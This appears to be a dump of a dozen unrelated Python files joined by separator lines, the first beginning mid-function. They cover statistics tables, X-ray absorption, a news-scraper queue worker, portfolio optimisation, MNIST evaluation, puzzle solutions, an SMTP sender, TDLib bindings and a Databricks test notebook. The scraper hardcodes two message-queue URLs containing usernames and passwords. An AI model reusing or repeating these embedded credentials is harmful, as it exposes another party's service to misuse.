x = x.groupby(['experiment', 'name'], as_index=False).agg(
{column: np.mean})
# Remove unnecessary columns
x = x[['name', column]]
mean, best = self.print_mean(x, column, 'min' if column in [
'ttf', 'prioritization_time'] else 'max')
mean['eff_symbol'] = " "
posthoc_df = None
all_equivalent = False
try:
k = kruskal_wallis(x, column, 'name')
kruskal, posthoc = k.apply(ax)
print(f"\n{kruskal}") # Kruskal results
all_equivalent = 'p-unc' not in kruskal.columns or kruskal[
'p-unc'][0] >= 0.05
if posthoc is not None:
print("\n--- POST-HOC TESTS ---")
print("\np-values:")
print(posthoc[0])
# Get the posthoc
df_eff = vargha_delaney.reduce(posthoc[1], best)
print(df_eff)
def get_eff_symbol(x, best, df_eff):
if x['name'] == best:
return "$\\bigstar$"
elif len(df_eff.loc[df_eff.compared_with == x['name'], 'effect_size_symbol'].values) > 0:
return df_eff.loc[df_eff.compared_with == x['name'], 'effect_size_symbol'].values[0]
else:
return df_eff.loc[df_eff.base == x['name'], 'effect_size_symbol'].values[0]
mean['eff_symbol'] = mean.apply(
lambda x: get_eff_symbol(x, best, df_eff), axis=1)
# Parse the posthoc to a dataframe in R because allows us
# to parse to pandas in Py
ro.r.assign('posthoc', posthoc[0])
ro.r('posthoc_table <- t(as.matrix(posthoc$p.value))')
ro.r('df_posthoc <- as.data.frame(t(posthoc_table))')
# Convert the dataframe from R to pandas
with localconverter(ro.default_converter + pandas2ri.converter):
posthoc_df = ro.conversion.rpy2py(ro.r('df_posthoc'))
except Exception as e:
print("\nError in statistical test:", exception_to_string(e))
# Concat the values to a unique columns
mean['avg_std_effect'] = mean.apply(
lambda row: f"{row['mean']:.4f} $\\pm$ {row['std']:.4f} {row['eff_symbol']}".strip(), axis=1)
def get_config_latex(row, best, posthoc_df, all_equivalent):
"""
Latex commands used:
- Best algorithm: \newcommand{\cellgray}[1]{\cellcolor{gray!30}{#1}}
- Equivalent to the best one: \newcommand{\cellbold}[1]{\cellcolor{gray!30}{\textbf{#1}}}
"""
current_name = row['name']
if all_equivalent:
return f"\\cellgray{{{row['avg_std_effect']}}}"
if row['name'] == best:
return f"\\cellbold{{{row['avg_std_effect']}}}"
is_equivalent = False
# If the posthoc was applied
if posthoc_df is not None:
if best in posthoc_df.columns and current_name in posthoc_df.index and not np.isnan(
posthoc_df.loc[current_name][best]):
# They are equivalent
is_equivalent = posthoc_df.loc[
current_name][best] >= 0.05
elif current_name in posthoc_df.columns and best in posthoc_df.index and not np.isnan(
posthoc_df.loc[best][current_name]):
# They are equivalent
is_equivalent = posthoc_df.loc[
best][current_name] >= 0.05
else:
raise Exception(
"Problem found when we tried to find the post-hoc p-value")
if is_equivalent:
return f"\\cellgray{{{row['avg_std_effect']}}}"
return row['avg_std_effect']
# Insert the latex commands
mean['latex_format'] = mean.apply(lambda row: get_config_latex(
row, best, posthoc_df, all_equivalent), axis=1)
# Select the main information
mean = mean[['name', 'latex_format']]
mean_trans = mean.copy()
mean_trans.index = mean['name']
mean_trans = mean_trans.transpose()
if len(diff_pol) > 0:
# We remove the value from the policies that do not have result
for dp in diff_pol:
mean_trans[dp] = '-'
# Return only the values
return mean_trans[self.columns_metrics].values[1]
else:
return ['-', '-', '-']
def statistical_test_kruskal(self, column='fitness'):
stat_columns = ['TimeBudget'] + self.columns_metrics
df_stats = pd.DataFrame(columns=stat_columns)
metric, ylabel = self._get_metric_ylabel(column)
print(
f"\n\n\n\n||||||||||||||||||||||||||||||| STATISTICAL TEST - KRUSKAL WALLIS - {metric} |||||||||||||||||||||||||||||||\n")
policies = self._get_policies()
fig, axes = plt.subplots(
ncols=len(self.datasets.keys()), sharex=True, sharey=True, figsize=(int(8.3 * 3 * (len(policies) / 3)), 8))
(ax1, ax2, ax3) = axes
for df_k, tr, ax in zip(self.datasets.keys(), self.sched_time_ratio_names, [ax1, ax2, ax3]):
print(f"~~~~ Time Budget {tr}% ~~~~")
row = self._statistical_test_kruskal(
self.datasets[df_k], ax, column)
row = np.insert(row, 0, tr)
df_stats = df_stats.append(
pd.DataFrame([row], columns=stat_columns))
ax.set_title(f"Time Budget: {tr}%")
ax.set_ylabel(ylabel if tr == '10' else '') # Workaround
ax.set_xticklabels(textwrap.fill(x.get_text(), MAX_XTICK_WIDTH)
for x in ax.get_xticklabels())
plt.tight_layout()
plt.savefig(f"{self.figure_dir}/{metric}_Kruskal.pdf", bbox_inches='tight')
plt.cla()
plt.close(fig)
df_stats['Metric'] = metric
return df_stats
|
# -*- coding: utf-8 -*-
execfile("initcctbx.py")
# Don't use the installed version
import os, sys
sys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from spectrocrunch.materials.compoundfromformula import compoundfromformula
from spectrocrunch.materials.mixture import mixture
from spectrocrunch.materials.types import fraction
import scipy.integrate as integrate
import scipy.optimize as optimize
import numpy as np
def test1():
compound1 = compoundfromformula("La2O3", 0, name="La2O3")
compound2 = compoundfromformula("SrO", 0, name="SrO")
compound3 = compoundfromformula("Co2O3", 0, name="Co2O3")
compound4 = compoundfromformula("Fe2O3", 0, name="Fe2O3")
m = mixture(
[compound1, compound2, compound3, compound4], [1, 1, 1, 1], fraction.mass
)
print (compound4.massfractions())
print ("")
elements = m.elemental_massfractions()
print ("")
for e in elements:
print (e, e.MM, elements[e])
class capillary_transmission:
def __init__(self, mu, rho, packing=1.0):
self.mu = mu
self.rho = rho * packing
def __call__(self, R):
if R == 0:
return 1.0
else:
# return np.exp(-2.*R*self.mu*self.rho) # estimation
return (
integrate.quad(
lambda x: np.exp(-2 * self.mu * self.rho * np.sqrt(R * R - x * x)),
-R,
R,
)[0]
/ (2 * R)
)
class capillary_transmission2:
def __init__(self, mu, rho, R):
self.mu = mu
self.rho = rho
self.R = R
def __call__(self, packing):
return (
integrate.quad(
lambda x: np.exp(
-2 * self.mu * self.rho * packing * np.sqrt(self.R * self.R - x * x)
),
-self.R,
self.R,
)[0]
/ (2 * self.R)
)
class capillary_refine:
def __init__(self, mu, rho, T, packing):
self.o = capillary_transmission(mu, rho, packing=packing)
self.transmission = T
def __call__(self, R):
return self.o(R) - self.transmission
class capillary_refine2:
def __init__(self, mu, rho, T, R):
self.o = capillary_transmission2(mu, rho, R)
self.transmission = T
def __call__(self, R):
return self.o(R) - self.transmission
def test2():
compound1 = compoundfromformula("C18H30O2", 0.9291, name="linseedoil")
compound2 = compoundfromformula("Pb3C2O8H2", 6.8, name="hydrocerussite")
m = mixture([compound1, compound2], [0.5, 0.5], fraction.volume)
mu = m.mass_att_coeff(35.0)
# 60% transmission
T = 0.6
# flat sample
thickness = -np.log(T) / (mu * m.density) # cm
# capillary
# R = 30e-4 # cm
# packing = optimize.broyden2(capillary_refine2(mu,m.density,T,R),0.7)
packing = 1.0
R = optimize.broyden2(capillary_refine(mu, m.density, T, packing), [80e-4])[0] # cm
# 1-3 ug
mass = 1 * 1e-6 # g
volume = mass / m.density # cm^3
print "Mixture:"
print "density = {} g/cm^3".format(m.density)
print "mass.att. = {} cm^2/g".format(mu)
print "\nCapillary:"
print "R = {} um".format(R * 1e4)
print "packing = {} %".format(packing * 100)
print "h = {} mm (@ total mass = {} ug)".format(
volume / (np.pi * R * R) * 10, mass * 1e6
)
print "\nFlat sample:"
print "thickness = {} um".format(thickness * 1e4)
print "footprint = {} mm^2 (@ total mass = {} ug)".format(
volume / thickness * 1e4, mass * 1e6
)
if __name__ == "__main__":
test2()
|
import os
import sys
from newspaper import Article
# import common package in parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
sys.path.append(os.path.join(os.path.dirname(__file__), 'scrapers'))
import cnn_news_scraper
from cloudAMQP_client import CloudAMQPClient
DEDUPE_NEWS_TASK_QUEUE_URL = 'amqp://sspuqxlv:su5SdhMPn-x2lnKElijEbGxLEGpZxtRT@wasp.rmq.cloudamqp.com/sspuqxlv'
DEDUPE_NEWS_TASK_QUEUE_NAME = 'tap-news-dedupe-news-task-queue'
SCRAPE_NEWS_TASK_QUEUE_URL = "amqp://mcyrgohw:CB44sIsZxuz-IInG5a5ESFGrnP0iIda4@crane.rmq.cloudamqp.com/mcyrgohw"
SCRAPE_NEWS_TASK_QUEUE_NAME = "tap-news-scrape-news-task-queue"
SLEEP_TIME_IN_SECONDS = 5
dedupe_news_queue_client = CloudAMQPClient(DEDUPE_NEWS_TASK_QUEUE_URL, DEDUPE_NEWS_TASK_QUEUE_NAME)
scrape_news_queue_client = CloudAMQPClient(SCRAPE_NEWS_TASK_QUEUE_URL, SCRAPE_NEWS_TASK_QUEUE_NAME)
def handle_message(msg):
if msg is None or not isinstance(msg, dict):
print 'message is broken'
return
task = msg
text = None
# if task['source'] == 'cnn':
# print 'scraping CNN news'
# text = cnn_news_scraper.extract_news(task['url'])
# else:
# print 'news source [%s] is not supported.' % task['source']
# task['text'] = text
article = Article(task['url'])
article.download()
article.parse()
# article.text is unicode, need to encode it to utf-8
task['text'] = article.text.encode('utf-8')
dedupe_news_queue_client.send_message(task)
while True:
if scrape_news_queue_client is not None:
msg = scrape_news_queue_client.get_message()
if msg is not None:
try:
handle_message(msg)
except Exception as e:
print e
pass
scrape_news_queue_client.sleep(SLEEP_TIME_IN_SECONDS)
|
import FWCore.ParameterSet.Config as cms
process = cms.PSet()
process.fwliteInput = cms.PSet(
fileNames = cms.vstring('file:patTuple.root'), ## mandatory
maxEvents = cms.int32(100), ## optional
outputEvery = cms.uint32(10), ## optional
)
process.fwliteOutput = cms.PSet(
fileName = cms.string('analyzeFWLiteHistograms.root'), ## mandatory
)
process.btagAnalyzer = cms.PSet(
## input specific for this analyzer
Jets = cms.InputTag("cleanPatJets"),
bTagAlgo=cms.string('trackCountingHighEffBJetTags'),
bins=cms.uint32(100),
lowerbin=cms.double(0.),
upperbin=cms.double(10.)
)
process.jecAnalyzer = cms.PSet(
## input specific for this analyzer
Jets = cms.InputTag("cleanPatJets"),
jecLevel=cms.string("L2Relative"),
patJetCorrFactors= cms.string('patJetCorrFactors')
)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import FinanceDataReader as fdr
from pykrx import stock
import datetime
import requests
# from datetime import timedelta # 마이크로초 전, 마이크로초 후 를 구하고 싶다면 timedelta
from dateutil.relativedelta import relativedelta # 몇달 전, 몇달 후, 몇년 전, 몇년 후 를 구하고 싶다면 relativedelta
from pypfopt.efficient_frontier import EfficientFrontier
from pypfopt import risk_models
from pypfopt import expected_returns
from pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices
from pypfopt import plotting
import warnings
warnings.filterwarnings(action='ignore')
from Class_Strategies import Strategies
import csv
stock_dual = Strategies.getHoldingsList('KOSPI')
prices = Strategies.getCloseDatafromList(stock_dual, '2021-01-01')
dualmomentumlist = Strategies.DualMomentum(prices, lookback_period = 20, n_selection = len(stock_dual)//2)
# # print(dualmomentumlist)
#
# with open('dualmomentumlist.csv','w') as file:
# write = csv.writer(file)
# write.writerow(dualmomentumlist)
def Dual_sharpe():
# 종목 이름 및 코드
kospi_temp = fdr.StockListing('KOSPI')[['Symbol', 'Name']]
kosdaq_temp = fdr.StockListing('KOSDAQ')[['Symbol', 'Name']]
code_name_dict = pd.concat([kospi_temp, kosdaq_temp])
code_name_dict = code_name_dict.set_index('Symbol').to_dict().get('Name') # {'095570': 'AJ네트웍스',
# assets = pd.read_csv('dualmomentumlist.csv') #np.array(dualmomentumlist)
# print(assets)
start_date = datetime.datetime.today() - relativedelta(years=3)
start_date = start_date.strftime('%Y%m%d')
today = datetime.datetime.today().strftime("%Y%m%d")
end_date = today
df = pd.DataFrame()
##################### 여기 추가됐습니다 : 관리종목 제거 ######################
# 관리종목 제거하기 위한 코드
# temp_assets = pd.read_csv('dualmomentumlist.csv')
temp_assets = np.array(dualmomentumlist)
# print(temp_assets)
krx_adm = fdr.StockListing('KRX-ADMINISTRATIVE')
# print(krx_adm)
# KRX 관리종목의 종목코드
under_ctrl = krx_adm['Symbol'].values
# print(under_ctrl)
assets = np.setdiff1d(temp_assets, under_ctrl)
# print(assets)
for s in assets:
df[s] = fdr.DataReader(s, start_date, end_date)['Close']
# drop null
dfnull = df.dropna(axis=1)
# 수익률의 공분산
mu = expected_returns.mean_historical_return(dfnull)
S = risk_models.sample_cov(dfnull)
# print(plotting.plot_covariance(S))
# 포폴 최적화 (Max sharp ratio) - 급등주
ef = EfficientFrontier(mu, S, solver="SCS")
weights = ef.max_sharpe()
cleaned_weights = ef.clean_weights()
print(ef.portfolio_performance(verbose=True))
one_million = 1000000
portfolio_val = 15 * one_million
latest_prices = get_latest_prices(dfnull)
weights = cleaned_weights
da = DiscreteAllocation(weights, latest_prices, total_portfolio_value=portfolio_val)
allocation, leftover = da.lp_portfolio(verbose=False)
rmse = da._allocation_rmse_error(verbose=False)
# 각 종목별 실제 투자 금액
inv_total_price = {}
for i in allocation.keys():
inv_total_price[i] = latest_prices.loc[i] * allocation[i]
inv_total_price
# 총 투자금액
investment = 0
for i in inv_total_price.values():
investment += i
print(investment)
# 각 종목별 실제 투자 비중
inv_total_weight = {}
for i in allocation.keys():
inv_total_weight[i] = inv_total_price[i] / investment
inv_total_weight
# 투자비중의 합계
investment_w = 0
for i in inv_total_weight.values():
investment_w += i
print(investment_w)
# 결과값으로 불러올 값을 리스트로 저장
name_list = [] # 종목명(회사이름)
total_price_stock = [] # 각 종목별 실제 투자 금액
total_weight_stock = [] # 각 종목별 실제 투자 비중
for i in allocation.keys(): # i = 포트폴리오에 할당된 종목의 종목코드
name_list.append(code_name_dict.get(i))
total_price_stock.append(inv_total_price.get(i))
total_weight_stock.append(inv_total_weight.get(i))
# Get the discrete allocation values
discrete_allocation_list = []
for symbol in allocation:
discrete_allocation_list.append(allocation.get(symbol))
print(discrete_allocation_list)
portfolio_df = pd.DataFrame(columns=['종목명', '종목코드', '수량(주)', '투자금액(원)', '투자비중'])
portfolio_df['종목명'] = name_list
portfolio_df['종목코드'] = allocation
portfolio_df['수량(주)'] = discrete_allocation_list
portfolio_df['투자금액(원)'] = total_price_stock
portfolio_df['투자비중'] = total_weight_stock
portfolio_df_sorted = portfolio_df.sort_values('투자비중', ascending=False)
portfolio_df_sorted = portfolio_df_sorted.reset_index(drop=True)
# 투자 금액에 따라 최적화된 포트폴리오 종목별 수량
portfolio_df_sorted.loc["합계", 2:] = portfolio_df_sorted.sum()
################# 코스피랑 비교 ####################
# 각 일자별, 종목별 종가에 해당 weights를 곱해주기
for i, weight in cleaned_weights.items():
dfnull[i] = dfnull[i] * weight
# 일자별 종목의 (종가*비중) 합계를 Port열에 저장
dfnull['Port'] = dfnull.sum(axis=1)
# 일자별 종가의 전일대비 변동률(수익률)을 portfolio라는 데이터프레임으로 저장
portfolio = dfnull[['Port']].pct_change()
# 코스피지수 불러오기
kospi = fdr.DataReader('KS11', start_date, end_date)[['Close']]
# 코스피지수의 변동률(수익률) 구하기
# 변동률(수익률) = (당일가격-전일가격) / 전일가격
# 7/20의 변동률(수익률) = (7/20 가격-7-19 가격) / 7/19 가격
kospi_pct = kospi.pct_change()
# 코스피와 포트폴리오 합치기
result = kospi_pct.join(portfolio)
# 1열을 0으로 (Nan 값을 0으로)
result.iloc[0] = 0
# 열 이름 변경
result.columns = ['KOSPI', 'PORTFOLIO']
# 1에서 시작해서, 전일대비 변동률(수익률)을 적용하여 수치화하기
wealth = (1 + result).cumprod()
# 포트폴리오와 KOSPI 지수의 '누적 수익률 추이'를 시각화하여 비교
# matplotlib.pyplot 스타일시트 설정
plt.style.use('fivethirtyeight')
plt.figure(figsize=(18, 5))
plt.plot(wealth.index, wealth.KOSPI, 'r', label='KOSPI')
plt.plot(wealth.index, wealth.PORTFOLIO, 'b', label="PORTFOLIO(Dual Momentum)")
plt.grid(True)
plt.title('Return Trend')
plt.xlabel('Date', fontsize=18, labelpad=7)
plt.ylabel('Return', fontsize=18, labelpad=7)
plt.legend(loc='best')
plt.savefig('Dual_sharpe_return.png', dpi=100)
plt.show()
# 변동률 비교
plt.figure(figsize=(18, 10))
plt.subplot(2, 1, 1)
plt.title('Volatility Trend')
plt.plot(result.index, result.KOSPI, 'r', label='KOSPI')
plt.yticks([-0.15, -0.10, -0.05, 0.00, 0.05, 0.10, 0.15])
plt.grid(True)
plt.ylabel('Volatility', fontsize=18, labelpad=7)
plt.legend(loc='best')
plt.subplot(2, 1, 2)
plt.title('Volatility Trend')
plt.plot(result.index, result.PORTFOLIO, 'b', label="PORTFOLIO(Up.Down.Zero)")
# plt.yticks([-0.15, -0.10, -0.05, 0.00, 0.05, 0.10, 0.15])
plt.ylabel('Volatility', fontsize=18, labelpad=7)
plt.legend(loc='best')
plt.grid(True)
plt.savefig('Dual_sharpe_votality.png', dpi=100)
plt.show()
# print(portfolio_df_sorted) # 데이터 프레임 출력시 시간이 걸림.
print('----- Dual Momentum sharpe portfolio performance -----')
# Show Funds Remaining
print('Funds Remaining: ', leftover, ' KRW')
# Show Portfolio performance
print(ef.portfolio_performance(verbose=True))
|
"""
See extensive documentation at
https://www.tensorflow.org/get_started/mnist/beginners
"""
# Directives needed by tensorFlow
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Some misc. libraries that are useful
import keras.backend as K
from keras.models import load_model
import numpy as np
from matplotlib import pyplot
from tensorflow.examples.tutorials.mnist import input_data
import Util.ML_Utils as utils
# Some misc. libraries that are useful
import os
import sys
import time
import math
# Let's print out the versions of python, tensorFlow and keras
utils.print_lib_versions()
# Import data once for all runs
mnist = input_data.read_data_sets(utils.PATH_TO_DATA, one_hot=True)
testCount = 0
data = []
dt = np.dtype([('name', np.unicode_, 72), ('loss', np.float64), ('accuracy', np.float64)])
path = ('{0}3/').format(utils.PATH_TO_TRAINED_MODELS)
for filename in os.listdir(path):
print('---------{}---------'.format(filename))
model = load_model(path+filename)
score = model.evaluate(mnist.test.images, mnist.test.labels, verbose=0)
s = "Test Loss:{0:.4f} Test Accuracy{1:.4f}".format(score[0], score[1])
data.append((filename, score[0], -1*score[1]))
testCount+=1
if(testCount > 99) :
break
l = np.array(data, dtype=dt)
sortedData=np.sort(l, order='accuracy')
print('########################')
print(type(l))
print(l.shape)
print(l.dtype)
print(sortedData)
|
# 로또의 최고 순위와 최저 순위
def solution(lottos, win_nums):
answer = []
# 0개 1개 ... 6개 동일할 때 등수
rank = [6,6,5,4,3,2,1]
# 당첨번호 카운터
count_lottos = {}
count_win = {}
count = 0
# 0이 없는 경우 대비
count_lottos[0] = 0
# 당첨번호 카운트
for num in win_nums:
count_lottos[num] = 0
count_win[num] = 1
# 추첨번호 카운트
for num in lottos:
try:count_lottos[num] += 1
except:count_lottos[num] = 1
# 등수 계산
for num in win_nums:
if count_lottos[num] == count_win[num]:
count += 1
# 최대
answer.append(rank[count+count_lottos[0]])
# 최소
answer.append(rank[count])
return answer
"""
테스트 1 〉 통과 (0.01ms, 10.3MB)
테스트 2 〉 통과 (0.01ms, 10.2MB)
테스트 3 〉 통과 (0.01ms, 10.1MB)
테스트 4 〉 통과 (0.01ms, 10.1MB)
테스트 5 〉 통과 (0.01ms, 10.3MB)
테스트 6 〉 통과 (0.01ms, 10.2MB)
테스트 7 〉 통과 (0.01ms, 10.2MB)
테스트 8 〉 통과 (0.01ms, 10.3MB)
테스트 9 〉 통과 (0.01ms, 10.2MB)
테스트 10 〉 통과 (0.01ms, 10.2MB)
테스트 11 〉 통과 (0.01ms, 10.1MB)
테스트 12 〉 통과 (0.01ms, 10.2MB)
테스트 13 〉 통과 (0.01ms, 10.2MB)
테스트 14 〉 통과 (0.01ms, 10.2MB)
테스트 15 〉 통과 (0.01ms, 10.3MB)
"""
|
from aocd import data
from aoc.utils import rows
import re
from functools import partial
rules = {}
for row in rows(data):
if ":" in row:
id_, rule = re.match(r"(\d*): (.*)", row).groups()
rules[int(id_)] = rule
messages = [row for row in rows(data) if ":" not in row and row != ""]
max_recursion_depth = max(map(len, messages))
def regex_rule_from_match(match: re.Match, depth):
if depth > max_recursion_depth:
return ""
return regex_for_rule(rules[int(match.group())], depth=depth + 1)
def regex_for_rule(rule, depth=1):
if match := re.match(r'"(.)"', rule):
return match.groups()[0]
regex_rule_from_match_with_depth = partial(regex_rule_from_match, depth=depth)
regex = re.sub(r"\b\d+\b", regex_rule_from_match_with_depth, rule)
return f"({regex.replace(' ', '')})"
def count_messages_that_match_rule_0():
pattern = re.compile(regex_for_rule("^" + rules[0] + "$"))
return len([message for message in messages if re.match(pattern, message)])
print(count_messages_that_match_rule_0())
rules[8] = "42 | 42 8"
rules[11] = "42 31 | 42 11 31"
print(count_messages_that_match_rule_0())
|
# Config
import json
import pathlib
# Read config.json
try:
path_cfg = pathlib.Path(
pathlib.Path.cwd()).parents[1].joinpath("config.json")
with open(path_cfg, "r") as _file:
settings = json.load(_file)
except:
path_cfg = pathlib.Path(
pathlib.Path.cwd()).parents[2].joinpath("config.json")
with open(path_cfg, "r") as _file:
settings = json.load(_file)
|
import smtplib
import logging
from functools import wraps
from email.header import Header
from email.mime.text import MIMEText
class SendEmailRetryTimeout(Exception):
pass
def error_retry(func):
@wraps(func)
def warps_func(*args, **kwargs):
for i in range(3):
try:
rlt = func(*args, **kwargs)
except Exception as e:
logging.exception(e)
logging.warning("Retry Func.%s, [%s]", func.__name__, i)
else:
break
else:
raise SendEmailRetryTimeout("Function retry failed.")
return rlt
return warps_func
def get_smtp_server(sender):
smtp_server = {
"hotmail": "smtp-mail.outlook.com",
"gmail": "smtp.gmail.com"
}
smtp_srv = None
for k, v in smtp_server.items():
if k in sender:
smtp_srv = v
break
else:
raise ValueError(f"Invalid Email Address [{sender}]")
logging.debug("Used SMTP server -> %s", smtp_srv)
return smtp_srv
@error_retry
def mail_sender(sender, sender_pwd, recv_email, mesg_contents, subject, msg_type):
""" SMTP send e-mail with smtp server "smtp.live.com"
Args:
send_email: sender email username.
send_pwd: sender email password.
recv_email: receiver email address.
mesg_text: email message contents.
subject: subject title.
subtype: subtype can be plain, html...etc.
"""
logging.debug("Send Mail by -> %s", sender)
logging.debug("Send Email to -> %s", recv_email)
smtp_srv = get_smtp_server(sender)
message = MIMEText(mesg_contents, msg_type, "utf-8")
message["From"] = Header(sender)
message["Subject"] = Header(subject)
server = smtplib.SMTP(smtp_srv, 587, timeout=30)
server.ehlo()
server.starttls()
server.ehlo()
server.login(sender, sender_pwd)
server.sendmail(sender, recv_email, message.as_string())
server.quit()
logging.info("Send mail successful!")
|
import inspect
import json
import os
from ctypes.util import find_library
from ctypes import *
from functools import wraps
from queue import Queue
from threading import Thread
from bot.custom import errors
from . import td_api
threads: list = list()
def run_async(func):
@wraps(func)
def async_func(*ar, **kw):
queue = Queue()
func_hl = Thread(target=func, args=ar, kwargs=kw)
threads.append(func_hl)
func_hl.start()
func_hl.join()
if not queue.empty():
return queue.get()
return func_hl
return func
def on_event(event: td_api.Update):
@run_async
def decorator(func):
add_event_handler(func, event)
return func
return decorator
handlers = {}
def add_event_handler(callback, event: td_api.Update):
handlers.update({callback: event})
@run_async
def ClassFactory(item):
def convert(item):
if isinstance(item, dict):
item = {k.replace('@extra', 'extra'): v for k, v in item.items()}
imp = __import__('bot.telegram.td_api', fromlist=[item['@type']])
klass = getattr(imp, item['@type'])
kwargs = {}
sig = inspect.signature(klass)
for k, v in sig.parameters.items():
_get = item.get(k, v.default)
if isinstance(_get, list):
_item = []
for x in _get:
_item.append(convert(x))
kwargs.update({k: _item})
else:
kwargs.update({k: convert(_get)})
return klass(**kwargs)
else:
return item
return convert(item)
def get_tdjon():
import os
if os.path.isfile('tdjson.so'):
return os.path.join(os.getcwd(), 'bot/telegram/tdjson.so')
elif os.path.isfile('tdjson.dll'):
return os.path.join(os.getcwd(), 'bot/telegram/tdjson.dll')
else:
return find_library('tdjson')
tdjson_path = get_tdjon()
if tdjson_path is None:
raise errors.LibraryNotFound('Can\'t find tdjson library', threads)
tdjson = CDLL(tdjson_path)
td_json_client_create = tdjson.td_json_client_create
td_json_client_create.restype = c_void_p
td_json_client_create.argtypes = []
td_json_client_receive = tdjson.td_json_client_receive
td_json_client_receive.restype = c_char_p
td_json_client_receive.argtypes = [c_void_p, c_double]
td_json_client_send = tdjson.td_json_client_send
td_json_client_send.restype = None
td_json_client_send.argtypes = [c_void_p, c_char_p]
td_json_client_execute = tdjson.td_json_client_execute
td_json_client_execute.restype = c_char_p
td_json_client_execute.argtypes = [c_void_p, c_char_p]
td_json_client_destroy = tdjson.td_json_client_destroy
td_json_client_destroy.restype = None
td_json_client_destroy.argtypes = [c_void_p]
fatal_error_callback_type = CFUNCTYPE(None, c_char_p)
td_set_log_fatal_error_callback = tdjson.td_set_log_fatal_error_callback
td_set_log_fatal_error_callback.restype = None
td_set_log_fatal_error_callback.argtypes = [fatal_error_callback_type]
def on_fatal_error_callback(error_message):
raise errors.TDlibFatalException(
'TDLib fatal error {error}:'.format(error=error_message))
def cast_to_json(obj):
if not isinstance(obj, dict):
_dict = obj.__dict__
_dict.update({'@type': obj.__tdlib_type__})
_dict.update({k.replace('_extra', '@extra'): v for k, v in _dict.items()})
else:
_dict = obj
return json.dumps(_dict)
def td_execute(query):
query = cast_to_json(query)
result = td_json_client_execute(None, query.encode('utf-8'))
if result:
result = json.loads(result.decode('utf-8'))
result = ClassFactory(result)
return result
def td_send(query):
query = cast_to_json(query)
td_json_client_send(client, query.encode('utf-8'))
def td_recieve():
result = td_json_client_receive(client, 1.0)
if result:
result = json.loads(result.decode())
return ClassFactory(result)
def td_send_and_receive(query):
td_send(query)
return td_recieve()
c_on_fatal_error_callback = fatal_error_callback_type(on_fatal_error_callback)
td_set_log_fatal_error_callback(c_on_fatal_error_callback)
td_execute(td_api.setLogVerbosityLevel(new_verbosity_level=0, extra=1.01234))
client = td_json_client_create()
|
# Databricks notebook source
# MAGIC
# MAGIC %md
# MAGIC # Class-Utility-Methods-Test
# MAGIC The purpose of this notebook is to faciliate testing of courseware-specific utility methos.
# COMMAND ----------
spark.conf.set("com.databricks.training.module-name", "common-notebooks")
# COMMAND ----------
# MAGIC %md
# MAGIC a lot of these tests evolve around the current DBR version.
# MAGIC
# MAGIC It shall be assumed that the cluster is configured properly and that these tests are updated with each publishing of courseware against a new DBR
# COMMAND ----------
# MAGIC %run ./Class-Utility-Methods
# COMMAND ----------
def functionPassed(result):
if not result:
raise AssertionError("Test failed")
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `getTags`
# COMMAND ----------
def testGetTags():
testTags = getTags()
# Setup tests
testsPassed = []
def passedTest(result, message = None):
if result:
testsPassed[len(testsPassed) - 1] = True
else:
testsPassed[len(testsPassed) - 1] = False
print('Failed Test: {}'.format(message))
# Test that getTags returns correct type
testsPassed.append(None)
try:
from py4j.java_collections import JavaMap
assert isinstance(getTags(), JavaMap)
passedTest(True)
except:
passedTest(False, "The correct type is not returned by getTags")
# Test that getTags does not return an empty dict
testsPassed.append(None)
try:
assert len(testTags) > 0
passedTest(True)
except:
passedTest(False, "A non-empty dict is returned by getTags")
# Print final info and return
if all(testsPassed):
print('All {} tests for getTags passed'.format(len(testsPassed)))
return True
else:
raise Exception('{} of {} tests for getTags passed'.format(testsPassed.count(True), len(testsPassed)))
functionPassed(testGetTags())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `getTag()`
# COMMAND ----------
def testGetTag():
# Setup tests
testsPassed = []
def passedTest(result, message = None):
if result:
testsPassed[len(testsPassed) - 1] = True
else:
testsPassed[len(testsPassed) - 1] = False
print('Failed Test: {}'.format(message))
# Test that getTag returns null when defaultValue is not set and tag is not present
testsPassed.append(None)
try:
assert getTag("thiswillneverbeincluded") == None
passedTest(True)
except:
passedTest(False, "NoneType is not returned when defaultValue is not set and tag is not present for getTag")
# Test that getTag returns defaultValue when it is set and tag is not present
testsPassed.append(None)
try:
assert getTag("thiswillneverbeincluded", "default-value") == "default-value"
passedTest(True)
except:
passedTest(False, "defaultValue is not returned when defaultValue is set and tag is not present for getTag")
# Test that getTag returns correct value when default value is not set and tag is present
testsPassed.append(None)
try:
orgId = getTags()["orgId"]
assert isinstance(orgId, str)
assert len(orgId) > 0
assert orgId == getTag("orgId")
passedTest(True)
except:
passedTest(False, "A non-empty dict is returned by getTags")
# Print final info and return
if all(testsPassed):
print('All {} tests for getTag passed'.format(len(testsPassed)))
return True
else:
raise Exception('{} of {} tests for getTag passed'.format(testsPassed.count(True), len(testsPassed)))
functionPassed(testGetTag())
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `getDbrMajorAndMinorVersions()`
# COMMAND ----------
def testGetDbrMajorAndMinorVersions():
(major,minor) = getDbrMajorAndMinorVersions()
assert major == latestDbrMajor, f"Found {major}"
assert minor == latestDbrMinor, f"Found {minor}"
return True
functionPassed(testGetDbrMajorAndMinorVersions())
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `getPythonVersion()`
# COMMAND ----------
def testGetPythonVersion():
# Setup tests
testsPassed = []
def passedTest(result, message = None):
if result:
testsPassed[len(testsPassed) - 1] = True
else:
testsPassed[len(testsPassed) - 1] = False
print('Failed Test: {}'.format(message))
# Test output for structure
testsPassed.append(None)
try:
pythonVersion = getPythonVersion()
assert isinstance(pythonVersion, str)
assert len(pythonVersion.split(".")) >= 2
passedTest(True)
except:
passedTest(False, "pythonVersion does not match expected structure")
# Test output for correctness
testsPassed.append(None)
try:
pythonVersion = getPythonVersion()
assert pythonVersion[0] == "2" or pythonVersion[0] == "3"
passedTest(True)
except:
passedTest(False, "pythonVersion does not match expected value")
# Print final info and return
if all(testsPassed):
print('All {} tests for getPythonVersion passed'.format(len(testsPassed)))
return True
else:
raise Exception('{} of {} tests for getPythonVersion passed'.format(testsPassed.count(True), len(testsPassed)))
functionPassed(testGetPythonVersion())
# COMMAND ----------
# MAGIC %md
# MAGIC
